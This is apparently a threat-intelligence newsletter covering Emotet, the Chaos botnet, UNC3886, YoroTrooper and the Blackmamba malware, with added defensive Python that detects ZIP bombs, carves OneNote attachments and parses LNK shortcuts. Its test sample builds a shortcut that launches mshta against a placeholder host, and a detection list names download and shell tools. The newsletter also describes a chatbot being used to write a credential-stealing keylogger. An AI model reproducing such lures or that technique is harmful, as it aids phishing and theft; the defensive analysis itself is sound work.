[CyberLand News] Weekly #5 - Threats and Malware
Latest news on threats, malware and vulnerabilities in the cyber land
Contents
New techniques for Emotet - OneNote mail attachment
Chaos Malware evolution
UNC3886 exploits FortiOS flaw
ChatGPT-powered Blackmamba malware
YoroTrooper, a CyberEspionage group
New techniques for Emotet - OneNote mail attachment
Emotet is a sophisticated modular malware that began as a banking trojan and typically spreads through email attachments. Its primary objective is to extract sensitive data, such as banking information and passwords, from its targets and transmit it to its Command and Control (C&C) server, and, as a loader, to drop additional malware onto the infected host.
Cyble Research and Intelligence Labs (CRIL) is closely monitoring the Emotet campaign that resumed on March 7th after three months of inactivity. Emotet is once again sending malicious emails and infecting devices worldwide as it rebuilds its botnet.
In the previous week's campaign, Emotet used malicious ZIP attachments containing DOC files. That campaign relied on a technique known as "ZIP bombing": the DOC file is padded with junk bytes to hundreds of megabytes so that it exceeds the file-size limits of many scanners, yet the padding compresses to a small archive that mail gateways will accept.
In the most recent campaign, however, Emotet has changed tactics and now attaches OneNote files to its spam emails instead of a ZIP archive containing malicious documents. OneNote is Microsoft's digital notebook application, widely used to keep notes, ideas and attachments in one place; a OneNote page can embed arbitrary files, which is what makes it attractive as a malware carrier.
Because OneNote is so widely deployed, other malware families, such as Qakbot, have also been observed using OneNote attachments in their spam campaigns. Threat actors (TAs) frequently change their infection techniques to evade anti-virus detection and increase the likelihood of successfully compromising targets; that is the primary motivation for adapting their methods.
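As an added example that is not part of the Cyble report or of this post, the Python below triages a mail attachment the way a gateway could for both tactics above: it reads only the ZIP central directory to flag members whose declared inflation ratio is absurd (a padded DOC in a tiny archive, without ever inflating it), and it carves every FileDataStoreObject out of a OneNote file by its MS-ONESTORE header GUID and classifies the embedded file by magic bytes and keywords. The GUIDs and the 36-byte object layout come from MS-ONESTORE; the thresholds, file names and the two samples are constructed for illustration and are not real Emotet artefacts.

```python
import io
import struct
import uuid
import zipfile

# FileDataStoreObject header/footer GUIDs from MS-ONESTORE; stored little-endian on
# disk, so the header bytes are E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC.
ONE_FILE_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
ONE_FILE_FOOTER = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le
ONE_FIXED_HEADER_LEN = 16 + 8 + 4 + 8   # guidHeader, cbLength, unused, reserved


def zip_inflation_findings(zip_bytes, max_ratio=100.0, max_uncompressed=64 * 1024 * 1024):
    """Flag ZIP members whose declared size or inflation ratio is suspicious.

    Only the central directory is read, so a padded document cannot exhaust the
    scanner. The sizes are attacker-declared (thresholds are illustrative), so an
    absurd ratio is a reason to quarantine, not proof of what the member contains.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for member in archive.infolist():
            ratio = member.file_size / max(member.compress_size, 1)
            if ratio > max_ratio or member.file_size > max_uncompressed:
                findings.append((member.filename, member.compress_size,
                                 member.file_size, round(ratio)))
    return findings


def carve_onenote_files(one_bytes):
    """Return (offset, payload) for every FileDataStoreObject in a .one blob.

    Embedded files are stored as raw bytes after the 36-byte object header, so
    no full OneNote parser is needed to recover them for further triage.
    """
    carved = []
    pos = one_bytes.find(ONE_FILE_HEADER)
    while pos != -1:
        (length,) = struct.unpack_from("<Q", one_bytes, pos + 16)   # cbLength
        start = pos + ONE_FIXED_HEADER_LEN
        payload = one_bytes[start:start + length]
        if len(payload) == length:          # skip truncated objects
            carved.append((pos, payload))
        pos = one_bytes.find(ONE_FILE_HEADER, pos + 16)
    return carved


def classify_payload(data):
    """Cheap magic-byte / keyword classification of a carved attachment."""
    head = data[:512].lstrip()
    if head.startswith(b"MZ"):
        return "pe-executable"
    if head.startswith(b"\xD0\xCF\x11\xE0"):
        return "ole-compound"           # legacy .doc/.xls
    if head.startswith(b"PK\x03\x04"):
        return "zip-container"          # OOXML, but also nested archives
    lowered = head.lower()
    if b"<script" in lowered or b"<hta:application" in lowered:
        return "hta-or-html-script"
    if b"createobject(" in lowered or b"wscript." in lowered:
        return "vbscript"
    if b"powershell" in lowered or b"invoke-expression" in lowered:
        return "powershell"
    return "unknown"


def triage_attachment(filename, data):
    """Return human-readable findings for one mail attachment."""
    findings = []
    if data[:4] == b"PK\x03\x04":
        for name, packed, unpacked, ratio in zip_inflation_findings(data):
            findings.append(f"{filename}: {name} inflates {packed} -> {unpacked} bytes ({ratio}x)")
    for offset, payload in carve_onenote_files(data):
        findings.append(f"{filename}: embedded {classify_payload(payload)} at offset {offset}")
    return findings


# --- constructed samples (not real Emotet artefacts) -------------------------

def build_padded_zip_sample():
    """A DOC-named member padded with 8 MiB of zeros, as a ZIP bomb would be."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("Invoice_0307.doc", b"\x00" * (8 * 1024 * 1024))
    return buf.getvalue()


def build_onenote_sample(*payloads):
    """A blob mimicking only the .one file GUID and the FileDataStoreObject layout."""
    blob = uuid.UUID("{7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}").bytes_le + b"\x00" * 48
    for payload in payloads:
        blob += (ONE_FILE_HEADER + struct.pack("<Q", len(payload))
                 + b"\x00" * 12 + payload + ONE_FILE_FOOTER + b"\x00" * 16)
    return blob


if __name__ == "__main__":
    for line in triage_attachment("invoice.zip", build_padded_zip_sample()):
        print(line)
    note = build_onenote_sample(
        b'<script language="VBScript">CreateObject("WScript.Shell")</script>',
        b"MZ" + b"\x90" * 60)
    for line in triage_attachment("note.one", note):
        print(line)
```

The ratio check deliberately never calls `extract`: a scanner that inflates a padded document to check its contents is doing exactly what the attacker wants. Carved OneNote payloads should be fed to the same downstream checks as a bare attachment, because the script or executable inside the note is the real lure.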
More details in “Recent Emotet Spam Campaign Utilizing New Tactics“
Chaos Malware evolution
The name Chaos has been used for several different pieces of malware, including ransomware, remote access trojans (RATs), and now a DDoS malware variant, which has caused some confusion in the security community. The Sysdig Threat Research Team has detected attacks that use the Chaos variant of the Kaiji botnet malware. Little has been published on this malware since September 2022, partly because of the ambiguous naming and partly because it is relatively new. Kaiji, which originated in China in 2020, is written in Golang. Chaos is likewise Chinese Golang malware, and it targets both Windows and Linux operating systems across multiple hardware architectures.
What sets Chaos apart is its focus on persistence on the target system and its use of defense-evasion tactics that are uncommon in Linux malware. In mid-January, Sysdig observed the malware attacking a misconfigured Apache Tomcat environment, which generated significant activity on their honeypot, and they saw it again at the end of February with some modifications. Earlier versions of this malware were obtained from a public malware repository and analyzed by Lumen's Black Lotus Labs.
The Sysdig Threat Research Team analyzed the captured attacks with an emphasis on the persistence techniques the malware employs, and their blog post closes with Indicators of Compromise (IOCs). Chaos appears to be an evolution of the Kaiji botnet and shares many of the behavioral attributes reported for earlier versions. In short, Kaiji was a DDoS botnet that targeted IoT devices by SSH brute-forcing; writing it in Go made it easy to cross-compile for common IoT architectures such as PowerPC and SPARC. The Chaos variant retains the same DDoS functionality: rather than building an emulator to trigger it, the team confirmed that the code supporting it is still present in the new version.
More details in “Chaos Malware Quietly Evolves Persistence and Evasion Techniques“
UNC3886 exploits FortiOS flaw
According to Mandiant, a suspected Chinese hacking group has been linked to the exploitation of a medium-severity security flaw in Fortinet's FortiOS operating system. The group, tracked as UNC3886, targets firewall and virtualization appliances, which lack EDR support, to deploy backdoors and maintain persistent access to victim environments; Mandiant notes that UNC3886 has unique capabilities and a deep understanding of these technologies. The group has been observed targeting Fortinet's FortiGate, FortiManager, and FortiAnalyzer appliances, exploiting a zero-day path-traversal vulnerability, tracked as CVE-2022-41328, which Fortinet patched on March 7, 2023. The attacks used two implants, THINCRUST and CASTLETAP; the latter beacons out to an actor-controlled server and accepts instructions to run commands, fetch payloads, and exfiltrate data from the compromised host. UNC3886 also used a utility dubbed TABLEFLIP, a network-traffic redirection tool that lets the actor connect directly to the FortiManager device regardless of its access-control-list rules.
More details in “Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation“
ChatGPT-powered Blackmamba malware
Jeff Sims, a cybersecurity expert and researcher at HYAS, has developed a proof-of-concept malware called Blackmamba that uses ChatGPT to generate its malicious code at runtime and, in HYAS's testing, bypassed Endpoint Detection and Response (EDR) tools. This is not an entirely new concept: CyberArk researchers reported in January 2023 on using ChatGPT to develop polymorphic malware. Blackmamba gathers sensitive user data such as passwords, credit card numbers, and usernames, and uses a Microsoft Teams webhook to send it to the attacker's Teams channel. Jeff used MS Teams because it gave access to an organization's internal sources, which made identifying valuable targets easier, and because traffic to a sanctioned collaboration platform blends in with normal activity.
Using ChatGPT's code-generation capabilities, Jeff created a polymorphic keylogger: each time the chatbot is queried it returns a freshly written keylogging routine, which the program runs with Python's exec() function, so every execution uses a unique script and no fixed malicious code is stored on disk. That is what makes the malware polymorphic and allowed it to go undetected by the EDR it was tested against. Attackers can use ChatGPT in the same way to mutate code and make it more elusive, or even to develop tooling that malware and ransomware developers can use to launch attacks. Jeff packaged the malware with auto-py-to-exe, a free, open-source utility, so that it runs as a standalone executable on various devices and can be spread within a targeted environment through social engineering or email.
As ChatGPT's machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.
More details in “Blackmamba: AI-Synthesized polymorphic keylogger with on-the-fly program modification“
YoroTrooper, a CyberEspionage group
Since at least June 2022, a new threat actor called "YoroTrooper" has been launching cyber-espionage campaigns targeting government and energy organizations in Commonwealth of Independent States (CIS) countries, according to Cisco Talos. YoroTrooper has compromised the accounts of a critical European Union healthcare agency, the World Intellectual Property Organization (WIPO), and various European embassies, using a combination of commodity and custom information stealers, remote access trojans, and Python-based malware. The group infects systems via phishing emails that contain malicious LNK attachments and decoy PDF documents. Cisco Talos has evidence of YoroTrooper exfiltrating large amounts of data from infected endpoints, including account credentials, cookies, and browsing histories.
Although YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, Cisco Talos analysts assess that this is a new cluster of activity. YoroTrooper targeted Belarusian entities in the summer of 2022 using malicious PDF files sent from email domains posing as Belarusian or Russian entities. In September 2022, the group registered several typosquatting domains imitating Russian government entities and experimented with VHDX-based distribution of .NET-based implants. In the following months, through the end of the year, the cyberspies shifted their focus to Belarus and Azerbaijan, deploying a custom Python-based implant named "Stink Stealer." In 2023, the threat actors used HTA files to download decoy documents and dropper implants onto the target's system, deploying a custom Python stealer against the governments of Tajikistan and Uzbekistan.
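The infection chain above starts with a shortcut that hands control to a script interpreter, so a mail gateway can triage .lnk attachments structurally rather than by signature. Added example (not Talos code, and not a real YoroTrooper sample): a minimal parser for the MS-SHLLINK format that pulls the target path, arguments and other StringData out of a shortcut, with heuristics for LOLBin targets, embedded URLs and padded arguments. The constructed lure, its mshta target and the decoy.example.invalid host are placeholders, not indicators from the Talos report.

```python
import struct
import uuid

# ShellLinkHeader layout and LinkFlags from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (0x04, "name"),
    (0x08, "relative_path"),
    (0x10, "working_dir"),
    (0x20, "arguments"),
    (0x40, "icon_location"),
)
INTERPRETERS = ("cmd.exe", "powershell", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")


def parse_lnk(data):
    """Extract the StringData fields (path, working dir, arguments, ...) from a .lnk."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (2-byte size + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize is the first field of LinkInfo
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
        pos += size
    return fields


def lnk_verdicts(fields):
    """Heuristics for a shortcut that arrived as a mail attachment (illustrative thresholds)."""
    command = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    reasons = [f"launches {name}" for name in INTERPRETERS if name in command]
    if "http://" in command or "https://" in command:
        reasons.append("command line carries a URL")
    args = fields.get("arguments", "")
    if len(args) > 200:
        reasons.append("unusually long arguments")
    if args != args.lstrip():                    # padding hides the command in the Properties dialog
        reasons.append("arguments padded with leading whitespace")
    return reasons


def build_lnk_sample(**strings):
    """Constructed minimal ShellLink carrying only the StringData fields given."""
    flags, body = IS_UNICODE, b""
    for flag, name in STRING_FIELDS:
        value = strings.get(name)
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    return header + b"\x00" * (LNK_HEADER_SIZE - len(header)) + body


if __name__ == "__main__":
    # Constructed lure in the style described above; the host name is a placeholder.
    lure = build_lnk_sample(
        name="Report",
        relative_path="..\\..\\..\\Windows\\System32\\mshta.exe",
        arguments="https://decoy.example.invalid/report.hta",
        icon_location="%SystemRoot%\\System32\\shell32.dll")
    fields = parse_lnk(lure)
    print(fields)
    print(lnk_verdicts(fields))
    print(lnk_verdicts(parse_lnk(build_lnk_sample(relative_path="..\\Documents\\report.docx"))))
```

The parser deliberately skips the IDList and LinkInfo blocks by their declared sizes instead of interpreting them; for triage the StringData is what matters, since that is where the interpreter, its arguments and any URL live. Real shortcuts also carry a LinkTargetIDList that names the executable, so a production check should resolve that as well rather than trusting the relative path alone.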
More details in “Talos uncovers espionage campaigns targeting CIS countries, embassies and EU health care agency“
A.I. support for text and images